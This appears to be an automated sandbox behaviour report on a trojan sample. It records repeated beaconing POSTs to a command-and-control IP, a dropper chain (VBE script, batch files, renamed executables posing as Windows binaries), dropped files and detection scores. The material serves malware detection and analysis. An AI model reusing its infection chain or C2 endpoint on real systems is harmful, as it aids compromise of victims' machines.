                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2488Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.239.51.56
                          Source: unknownHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.239.51.56
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.239.51.56/
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.00000000032D8000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.php
                          Source: RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.239H
                          Source: ComponentBrokermonitor.exe, 00000004.00000002.1765850091.0000000003358000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: RuntimeBroker.exe, 00000009.00000002.2905721742.0000000020292000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: C:\Recovery\RuntimeBroker.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                          System Summary

                          barindex
                          Windows Scripting host queries suspicious COM object (likely to drop second stage)
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E06FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00E06FAA
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0848E0_2_00E0848E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E16CDC0_2_00E16CDC
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E040FE0_2_00E040FE
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E100B70_2_00E100B7
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E140880_2_00E14088
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E251C90_2_00E251C9
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E171530_2_00E17153
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E032F70_2_00E032F7
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E162CA0_2_00E162CA
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E143BF0_2_00E143BF
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0F4610_2_00E0F461
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E2D4400_2_00E2D440
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0C4260_2_00E0C426
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E177EF0_2_00E177EF
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E2D8EE0_2_00E2D8EE
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0286B0_2_00E0286B
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E319F40_2_00E319F4
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0E9B70_2_00E0E9B7
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E13E0B0_2_00E13E0B
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0EFE20_2_00E0EFE2
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E24F9A0_2_00E24F9A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BAC0D744_2_00007FFD9BAC0D74
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC74A184_2_00007FFD9BC74A18
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC746BD4_2_00007FFD9BC746BD
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC739F24_2_00007FFD9BC739F2
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC738FA4_2_00007FFD9BC738FA
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC748AA4_2_00007FFD9BC748AA
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC600384_2_00007FFD9BC60038
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC747344_2_00007FFD9BC74734
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC7571D4_2_00007FFD9BC7571D
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC747504_2_00007FFD9BC74750
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC8073D4_2_00007FFD9BC8073D
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4_2_00007FFD9BC73EFA4_2_00007FFD9BC73EFA
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BAD0D749_2_00007FFD9BAD0D74
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BC84B3D9_2_00007FFD9BC84B3D
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BC852FA9_2_00007FFD9BC852FA
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BC839FD9_2_00007FFD9BC839FD
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9BC700319_2_00007FFD9BC70031
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 9_2_00007FFD9C1B609D9_2_00007FFD9C1B609D
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\ERuFRGqx.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: String function: 00E1EB78 appears 39 times
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: String function: 00E1EC50 appears 56 times
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: String function: 00E1F5F0 appears 31 times
                          Source: voed9G7p5s.exe, 00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs voed9G7p5s.exe
                          Source: voed9G7p5s.exe, 00000000.00000003.1649134504.0000000000644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs voed9G7p5s.exe
                          Source: voed9G7p5s.exe, 00000000.00000003.1649059906.000000000063D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs voed9G7p5s.exe
                          Source: voed9G7p5s.exe, 00000000.00000003.1649059906.000000000063D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs voed9G7p5s.exe
                          Source: voed9G7p5s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engineClassification label: mal100.troj.evad.winEXE@18/31@0/1
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E06C74 GetLastError,FormatMessageW,0_2_00E06C74
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00E1A6C2
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Program Files (x86)\msecache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\Desktop\yIzGwiSf.logJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
                          Source: C:\Recovery\RuntimeBroker.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                          Source: C:\Recovery\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\Local\554f049d678a045e30ca1c0b02f850d36d0223cd7b5055b518f68280165f163e
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile created: C:\Users\user\AppData\Local\Temp\S2ennV6xhFJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCommand line argument: sfxname0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCommand line argument: sfxstime0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCommand line argument: STARTDLG0_2_00E1DF1E
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCommand line argument: xz0_2_00E1DF1E
                          Source: voed9G7p5s.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Recovery\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: voed9G7p5s.exeVirustotal: Detection: 58%
                          Source: voed9G7p5s.exeReversingLabs: Detection: 71%
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeFile read: C:\Users\user\Desktop\voed9G7p5s.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\voed9G7p5s.exe "C:\Users\user\Desktop\voed9G7p5s.exe"
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe"
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\savesSession\ComponentBrokermonitor.exe "C:\savesSession/ComponentBrokermonitor.exe"
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\RuntimeBroker.exe "C:\Recovery\RuntimeBroker.exe"
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" Jump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" "Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\savesSession\ComponentBrokermonitor.exe "C:\savesSession/ComponentBrokermonitor.exe"Jump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
